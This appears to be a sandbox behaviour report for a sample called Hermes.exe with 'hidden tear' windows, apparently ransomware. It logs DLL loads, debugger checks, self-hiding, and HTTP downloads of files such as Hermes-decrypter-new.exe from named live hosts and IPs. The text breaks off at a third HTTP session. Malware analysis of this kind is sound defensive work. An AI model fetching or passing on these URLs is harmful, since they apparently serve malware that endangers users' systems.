Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\SYSTEM32\MSVCR120_CLR0400.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\f12799647dc4f4abd2f0f17790337f04\mscorlib.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\SYSTEM32\CRYPTSP.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\system32\rsaenh.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\SYSTEM32\bcrypt.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\fcfb8bac8ea9a0e69d72c350b22f8e3f\System.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Drawing\5b307e2b9719b21749a8c73127ab5f45\System.Drawing.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\02d3b6022cc1ee466eb660dedcff59aa\System.Windows.Forms.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\psapi.dll, size = 2048 True 1
Fn
Get Filename c:\users\fd1hvy\desktop\hermes.exe process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\Users\FD1HVy\Desktop\Hermes.exe, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\ntdll.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\SYSTEM32\ntdll.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\kernel32.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\KERNEL32.DLL, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\kernelbase.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\KERNELBASE.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\SYSTEM32\apphelp.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\ole32.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\ole32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\combase.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\ucrtbase.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\RPCRT4.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\SspiCli.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\CRYPTBASE.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\bcryptPrimitives.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\sechost.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\GDI32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\gdi32full.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\msvcp_win.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\user32.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\USER32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\win32u.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\oleaut32.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\OLEAUT32.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\wtsapi32.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\SYSTEM32\WTSAPI32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\msvcrt.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\IMM32.DLL, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\kernel.appcore.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\system32\uxtheme.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\mscoree.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\SYSTEM32\mscoree.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\ADVAPI32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\SHLWAPI.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\SYSTEM32\MSVCR120_CLR0400.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\f12799647dc4f4abd2f0f17790337f04\mscorlib.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\SYSTEM32\CRYPTSP.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\system32\rsaenh.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\SYSTEM32\bcrypt.dll, size = 2048 True 1
Fn
Get Filename c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\fcfb8bac8ea9a0e69d72c350b22f8e3f\System.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Drawing\5b307e2b9719b21749a8c73127ab5f45\System.Drawing.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\02d3b6022cc1ee466eb660dedcff59aa\System.Windows.Forms.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\psapi.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\SYSTEM32\version.dll, size = 2048 True 1
Fn
Get Filename mscorjit.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\Users\FD1HVy\Desktop\Hermes.exe, size = 260 True 2
Fn
Get Filename c:\users\fd1hvy\desktop\hermes.exe process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\Users\FD1HVy\Desktop\Hermes.exe, size = 2048 True 2
Fn
Get Filename comctl32.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\Users\FD1HVy\Desktop\Hermes.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75ea4ae0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75ea4b20 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75ea4b40 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x75ea4b00 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77c129e0 True 16
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77c11ec0 True 6
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75ea5960 True 1
Fn
Get Address c:\windows\syswow64\mscoree.dll function = CLRCreateInstance, address_out = 0x744d5000 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll function = getJit, address_out = 0x72803d60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x74600140 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AppPolicyGetClrCompat, address_out = 0x74f768b0 True 1
Fn
Get Address c:\windows\syswow64\mscoree.dll function = CorExitProcess, address_out = 0x744d21f0 True 1
Fn
Create Mapping - protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Map - process_name = c:\users\fd1hvy\desktop\hermes.exe, address_out = 0x0 False 1
Fn
User (2)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = FD1HVy True 1
Fn
Window (26)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create hidden tear class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create .NET-BroadcastEventWindow.4.0.0.0.141b42a.0 class_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, wndproc_parameter = 0 True 1
Fn
Create hidden tear class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.0.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 2
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 88689294 True 1
Fn
Set Attribute hidden tear class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute hidden tear class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 88689374 True 1
Fn
Set Attribute hidden tear class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -8, new_long = 0 False 1
Fn
Set Attribute hidden tear class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -16, new_long = 47120384 True 1
Fn
Set Attribute hidden tear class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -20, new_long = 327808 True 1
Fn
Set Attribute hidden tear class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -16, new_long = 315555840 True 1
Fn
Set Attribute hidden tear class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -20, new_long = 852096 True 1
Fn
Set Attribute - index = -8, new_long = 0 True 1
Fn
Set Attribute hidden tear class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute hidden tear class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 88689574 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.0.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.0.app.0.141b42a_r11_ad1, index = -4, new_long = 88689654 True 1
Fn
Set Attribute hidden tear class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -8, new_long = 393294 False 1
Fn
Set Attribute hidden tear class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -8, new_long = 393294 True 1
Fn
Set Attribute hidden tear class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -16, new_long = 315555840 True 1
Fn
Set Attribute hidden tear class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -20, new_long = 589952 True 1
Fn
Set Attribute - index = -8, new_long = 458798 True 1
Fn
Set Attribute .NET-BroadcastEventWindow.4.0.0.0.141b42a.0 class_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, index = -4, new_long = 1952448832 True 1
Fn
System (77)
»
Operation Additional Information Success Count Logfile
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Get window text window_text = 1698852 True 2
Fn
Get window text window_text = 1698068 True 1
Fn
Get window text window_text = 1697684 True 2
Fn
Get window text window_text = 1696784 True 1
Fn
Get window text window_text = 1696660 True 1
Fn
Get window text window_text = 1696456 True 1
Fn
Get window text window_text = 1695240 True 1
Fn
Get window text window_text = 1697528 True 2
Fn
Get window text window_text = 1696632 True 1
Fn
Get window text window_text = 1698044 True 1
Fn
Get window text window_text = 1697680 True 1
Fn
Get window text window_text = 1696464 True 1
Fn
Get Computer Name result_out = NQDPDE True 1
Fn
Sleep duration = 0 milliseconds (0.000 seconds) True 4
Fn
Sleep duration = -1 (infinite) True 1
Fn
Sleep duration = 20 milliseconds (0.020 seconds) True 1
Fn
Get Time type = System Time, time = 2019-05-24 16:56:10 (UTC) True 1
Fn
Get Time type = Ticks, time = 134453 True 1
Fn
Get Time type = Performance Ctr, time = 13448684662 True 1
Fn
Get Time type = System Time, time = 2019-05-24 16:56:11 (UTC) True 1
Fn
Get Time type = Ticks, time = 135984 True 1
Fn
Get Time type = Performance Ctr, time = 13601859239 True 1
Fn
Get Time type = Performance Ctr, time = 17951423187 True 1
Fn
Get Time type = Performance Ctr, time = 18574953262 True 1
Fn
Get Time type = Performance Ctr, time = 18574959973 True 1
Fn
Get Time type = Performance Ctr, time = 18575033856 True 1
Fn
Get Time type = Performance Ctr, time = 18575062697 True 1
Fn
Get Time type = Performance Ctr, time = 18575091237 True 1
Fn
Get Time type = Performance Ctr, time = 18575119420 True 1
Fn
Get Time type = Performance Ctr, time = 18575149203 True 1
Fn
Get Time type = Performance Ctr, time = 18575397230 True 1
Fn
Get Time type = Performance Ctr, time = 18575429702 True 1
Fn
Get Time type = Performance Ctr, time = 18575458778 True 1
Fn
Get Time type = Performance Ctr, time = 18575547535 True 1
Fn
Get Time type = Performance Ctr, time = 18575577421 True 1
Fn
Get Time type = Performance Ctr, time = 18575606106 True 1
Fn
Get Time type = Performance Ctr, time = 18575693727 True 1
Fn
Get Time type = Performance Ctr, time = 18575723239 True 1
Fn
Get Time type = Performance Ctr, time = 18575752640 True 1
Fn
Get Time type = Performance Ctr, time = 18575828667 True 1
Fn
Get Time type = Performance Ctr, time = 18575881093 True 1
Fn
Get Time type = Performance Ctr, time = 18575916108 True 1
Fn
Get Time type = Performance Ctr, time = 18576062207 True 1
Fn
Get Time type = Performance Ctr, time = 18576091320 True 1
Fn
Get Time type = Performance Ctr, time = 18576119981 True 1
Fn
Get Time type = Performance Ctr, time = 18576203635 True 1
Fn
Get Time type = Performance Ctr, time = 18576232379 True 1
Fn
Get Time type = Performance Ctr, time = 18576313836 True 1
Fn
Get Time type = Performance Ctr, time = 18576343949 True 1
Fn
Get Time type = Performance Ctr, time = 18576418515 True 1
Fn
Get Time type = Performance Ctr, time = 18576447690 True 1
Fn
Get Time type = Performance Ctr, time = 18576476058 True 1
Fn
Get Time type = Performance Ctr, time = 18576555505 True 1
Fn
Get Time type = Performance Ctr, time = 18576584030 True 1
Fn
Get Time type = Performance Ctr, time = 18576612426 True 1
Fn
Get Time type = Performance Ctr, time = 18576689783 True 1
Fn
Get Time type = Performance Ctr, time = 18576720338 True 1
Fn
Get Time type = Performance Ctr, time = 18576797612 True 1
Fn
Get Time type = Performance Ctr, time = 18576826058 True 1
Fn
Get Time type = Performance Ctr, time = 18576871104 True 1
Fn
Get Time type = Performance Ctr, time = 18579074903 True 1
Fn
Get Time type = Performance Ctr, time = 18729311206 True 1
Fn
Get Time type = Performance Ctr, time = 20265555310 True 1
Fn
Get Time type = Performance Ctr, time = 22216711804 True 1
Fn
Get Info type = SYSTEM_MODULE_INFORMATION False 1
Fn
Get Info type = SYSTEM_MODULE_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Network Adapter Info - False 1
Fn
Get Network Adapter Info - True 1
Fn
Environment (10)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Get Environment String name = PinnableBufferCache_System.Net.HttpWebRequest_Disabled False 1
Fn
Get Environment String name = PinnableBufferCache_System.Net.HttpWebRequest_MinCount False 1
Fn
Get Environment String name = PinnableBufferCache_System.Net.Connection_Disabled False 1
Fn
Get Environment String name = PinnableBufferCache_System.Net.Connection_MinCount False 1
Fn
Get Environment String name = PinnableBufferCache_System.Net.SslStream_Disabled False 2
Fn
Get Environment String name = PinnableBufferCache_System.Net.SslStream_MinCount False 2
Fn
Debug (4)
»
Operation Process Additional Information Success Count Logfile
Check for Presence c:\users\fd1hvy\desktop\hermes.exe - True 1
Fn
Check for Presence c:\users\fd1hvy\desktop\hermes.exe - True 1
Fn
Check for Presence c:\users\fd1hvy\desktop\hermes.exe - False 1
Fn
Hide c:\users\fd1hvy\desktop\hermes.exe - True 1
Fn
Network Behavior
DNS (3)
»
Operation Additional Information Success Count Logfile
Resolve Name host = www.google.com, address_out = 172.217.22.36 True 1
Fn
Resolve Name host = h139975.s08.test-hf.su, address_out = 91.227.16.118 True 1
Fn
Resolve Name host = giftshop.host, address_out = 5.101.152.98 True 1
Fn
HTTP Sessions (4)
»
Information Value
Total Data Sent 900 bytes
Total Data Received 32.38 MB
Contacted Host Count 2
Contacted Hosts 5.101.152.98, 91.227.16.118
HTTP Session #1
»
Information Value
Server Name h139975.s08.test-hf.su
Server Port 80
Username -
Password -
Data Sent 251 bytes
Data Received 10.79 MB
Operation Additional Information Success Count Logfile
Open Session - True 1
Fn
Open Connection protocol = http, server_name = h139975.s08.test-hf.su, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /SmailFile/1.jpg True 1
Fn
Send HTTP Request headers = Host: h139975.s08.test-hf.su, Connection: Keep-Alive, url = h139975.s08.test-hf.su/SmailFile/1.jpg True 1
Fn
Data
Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Read Response size = 65536, size_out = 9904 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 61027, size_out = 30800 True 1
Fn
Data
Read Response size = 30227, size_out = 2800 True 1
Fn
Data
Read Response size = 27427, size_out = 27427 True 1
Fn
Data
HTTP Session #2
»
Information Value
Server Name h139975.s08.test-hf.su
Server Port 80
Username -
Password -
Data Sent 251 bytes
Data Received 10.79 MB
Operation Additional Information Success Count Logfile
Open Session - True 1
Fn
Open Connection protocol = http, server_name = h139975.s08.test-hf.su, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /SmailFile/Hermes-decrypter-new.exe True 1
Fn
Send HTTP Request headers = Host: h139975.s08.test-hf.su, url = h139975.s08.test-hf.su/SmailFile/Hermes-decrypter-new.exe True 1
Fn
Data
Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Read Response size = 65536, size_out = 9712 True 1
Fn
Data
Read Response size = 65536, size_out = 58800 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 25200 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 11200 True 1
Fn
Data
Read Response size = 65536, size_out = 22400 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 14000 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 22400 True 1
Fn
Data
Read Response size = 65536, size_out = 11200 True 1
Fn
Data
Read Response size = 65536, size_out = 16800 True 1
Fn
Data
Read Response size = 65536, size_out = 30800 True 1
Fn
Data
Read Response size = 65536, size_out = 25200 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 11200 True 1
Fn
Data
Read Response size = 65536, size_out = 16800 True 1
Fn
Data
Read Response size = 65536, size_out = 14000 True 2
Fn
Data
Read Response size = 65536, size_out = 16800 True 1
Fn
Data
Read Response size = 65536, size_out = 14000 True 1
Fn
Data
Read Response size = 65536, size_out = 16800 True 1
Fn
Data
Read Response size = 65536, size_out = 14000 True 1
Fn
Data
Read Response size = 65536, size_out = 16800 True 1
Fn
Data
Read Response size = 65536, size_out = 14000 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 33600 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 22400 True 1
Fn
Data
Read Response size = 65536, size_out = 1400 True 1
Fn
Data
Read Response size = 65536, size_out = 47600 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 14000 True 1
Fn
Data
Read Response size = 65536, size_out = 22400 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 30800 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 22400 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 2
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 22400 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 22400 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 25200 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 22400 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 39200 True 1
Fn
Data
Read Response size = 65536, size_out = 33600 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 39200 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 16800 True 1
Fn
Data
Read Response size = 65536, size_out = 54600 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 30800 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 36400 True 1
Fn
Data
Read Response size = 65536, size_out = 16800 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 11200 True 1
Fn
Data
Read Response size = 65536, size_out = 16800 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 16800 True 1
Fn
Data
Read Response size = 65536, size_out = 11200 True 1
Fn
Data
Read Response size = 65536, size_out = 16800 True 1
Fn
Data
Read Response size = 65536, size_out = 11200 True 1
Fn
Data
Read Response size = 65536, size_out = 16800 True 1
Fn
Data
Read Response size = 65536, size_out = 14000 True 4
Fn
Data
Read Response size = 65536, size_out = 12600 True 1
Fn
Data
Read Response size = 65536, size_out = 35000 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 11200 True 2
Fn
Data
Read Response size = 65536, size_out = 50400 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 25200 True 1
Fn
Data
Read Response size = 65536, size_out = 44800 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 25200 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 25200 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 5
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 30800 True 2
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 30800 True 2
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 36400 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 33600 True 1
Fn
Data
Read Response size = 65536, size_out = 14000 True 1
Fn
Data
Read Response size = 65536, size_out = 16800 True 1
Fn
Data
Read Response size = 65536, size_out = 14000 True 2
Fn
Data
Read Response size = 65536, size_out = 30800 True 2
Fn
Data
Read Response size = 65536, size_out = 33600 True 1
Fn
Data
Read Response size = 65536, size_out = 16800 True 1
Fn
Data
Read Response size = 65536, size_out = 46200 True 1
Fn
Data
Read Response size = 65536, size_out = 9800 True 1
Fn
Data
Read Response size = 65536, size_out = 16800 True 1
Fn
Data
Read Response size = 65536, size_out = 7000 True 1
Fn
Data
Read Response size = 65536, size_out = 50400 True 1
Fn
Data
Read Response size = 65536, size_out = 30800 True 1
Fn
Data
Read Response size = 65536, size_out = 39200 True 1
Fn
Data
For performance reasons, the remaining 114 entries are omitted.
The remaining entries can be found in glog.xml.
HTTP Session #3
»
Information Value
